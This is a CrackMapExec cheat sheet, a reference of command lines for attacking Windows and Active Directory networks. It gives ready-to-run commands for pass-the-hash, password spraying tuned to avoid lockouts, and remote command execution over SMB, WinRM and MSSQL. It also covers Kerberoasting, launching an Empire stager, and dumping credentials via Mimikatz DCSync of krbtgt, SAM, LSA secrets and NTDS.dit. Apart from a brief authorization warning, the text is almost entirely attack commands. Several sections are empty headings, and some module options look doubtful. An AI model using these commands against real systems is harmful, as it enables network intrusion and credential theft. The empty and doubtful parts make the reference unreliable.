# CrackMapExec Cheat Sheet

## Overview

CrackMapExec (CME) is a post-exploitation tool designed for penetration testing and red team operations in Windows/Active Directory environments. It is often described as a "Swiss army knife" for network penetration testing, enabling enumeration, credential testing and command execution across multiple protocols.

⚠️ Warning: CrackMapExec is a security testing tool that should only be used in environments for which you have explicit authorization.
## Installation

### Using pipx (Recommended)

```bash
# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath
# Install CrackMapExec
pipx install crackmapexec
```
### On Kali Linux

### From GitHub

### Using Docker
## Basic Usage

### General Syntax

### Supported Protocols

- smb: Server Message Block
- winrm: Windows Remote Management
- ldap: Lightweight Directory Access Protocol
- mssql: Microsoft SQL Server
- ssh: Secure Shell
- rdp: Remote Desktop Protocol
- ftp: File Transfer Protocol
### Target Specification

```bash
# Single target
crackmapexec smb 192.168.1.100
# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101
# IP range
crackmapexec smb 192.168.1.1-255
# CIDR notation
crackmapexec smb 192.168.1.0/24
# From file
crackmapexec smb targets.txt
```
## Authentication Methods

### Username and Password

```bash
# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'
# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'
# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'
# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt
```

### Pass-the-Hash

```bash
# NTLM hash (LM:NT format)
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'
# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'
# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt
```
### Local Authentication

### Domain Authentication
## SMB Protocol Commands

### Basic Enumeration

```bash
# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares
# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users
# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users
# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups
# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups
# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol
# Check for SMB signing (hosts that do not require signing are written to the relay list)
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt
```
### Command Execution

```bash
# Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'
# Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'
```
### File Operations

```bash
# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'
# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt
# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'
```
## WinRM Protocol Commands

### Basic Enumeration

### Command Execution

```bash
# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'
# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'
```
## LDAP Protocol Commands

### Basic Enumeration

```bash
# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain
# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users
# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups
# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers
# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol
# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts
```

### Advanced Enumeration

```bash
# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description
# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation
# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate
# Search for AS-REP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt
# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt
```
## MSSQL Protocol Commands

### Basic Enumeration

```bash
# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'
# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'
```

### Command Execution

```bash
# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'
# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'
```
## Module Usage

### Module Management

```bash
# List available modules
crackmapexec <protocol> --list-modules
# Get module options
crackmapexec <protocol> -M <module> --options
# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2
```
### Common Modules

#### Mimikatz

```bash
# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'
# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'
# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'
# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'
```

#### Empire

```bash
# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http
```

#### PowerView

```bash
# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'
```

#### BloodHound

```bash
# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All
```

#### Lsassy

```bash
# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy
```

#### Enum_DNS

```bash
# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns
```

#### GOAD

```bash
# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad
```
## Advanced Techniques

### Password Spraying

```bash
# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'
# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt
# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10
```
### Credential Harvesting

```bash
# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam
# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa
# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds
```
## Database Operations

### Initialize Database

### View Database

```bash
# List hosts
crackmapexec smb --database -L
# List credentials
crackmapexec smb --database -C
# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1
```
## Common Options

### General Options

| Option | Description |
|---|---|
| -h, --help | Show help message and exit |
| -t THREADS | Set the number of concurrent threads (default: 100) |
| --timeout TIMEOUT | Set the connection timeout (default: 5 seconds) |
| --verbose | Enable verbose output |
| --debug | Enable debug output |
| --continue-on-success | Continue authentication attempts even after a success |
| --no-bruteforce | No bruteforce, use only the supplied credentials |
| --fail-limit LIMIT | Number of failed login attempts before giving up on a host |
| --jitter JITTER | Add a random delay between authentication attempts (in seconds) |
| --local-auth | Authenticate using local accounts instead of domain accounts |
| -d, --domain DOMAIN | Domain to authenticate to |
| --no-output | Do not display output |
| --output-file FILE | Write output to a file |
| --log | Enable logging to file (default: ~/.cme/logs/) |

### SMB Options

| Option | Description |
|---|---|
| --shares | List available shares |
| --sessions | List active sessions |
| --disks | List disks |
| --loggedon-users | List logged-on users |
| --users | List domain users |
| --groups | List domain groups |
| --local-groups | List local groups |
| --pass-pol | Get password policy |
| --rid-brute [MAX_RID] | Enumerate users via RID bruteforcing |
| --sam | Dump SAM hashes |
| --lsa | Dump LSA secrets |
| --ntds | Dump NTDS.dit |
| --exec-method {smbexec,wmiexec,mmcexec,atexec} | Method used to execute commands |

### LDAP Options

| Option | Description |
|---|---|
| --users | List domain users |
| --groups | List domain groups |
| --computers | List domain computers |
| --domain | Get domain information |
| --pass-pol | Get password policy |
| --trusts | Get domain trusts |
| --asreproast [OUTFILE] | Get AS-REP roastable users |
| --kerberoasting [OUTFILE] | Get kerberoastable users |
| --trusted-for-delegation | Get users/computers with unconstrained delegation |
| --allowed-to-delegate | Get users/computers with constrained delegation |

### WinRM Options

| Option | Description |
|---|---|
| --port [PORT] | WinRM port (default: 5985) |
| --ssl | Use SSL for WinRM |

### MSSQL Options

| Option | Description |
|---|---|
| --port [PORT] | MSSQL port (default: 1433) |
| -q QUERY | Run SQL query |
## Resources

- [Official GitHub Repository](https://github.com/byt3bl33d3r/CrackMapExec)
- [CrackMapExec Wiki](https://github.com/byt3bl33d3r/CrackMapExec/wiki)
- [CrackMapExec Installation Guide](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation)
- [CrackMapExec Module Documentation](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Module-Documentation)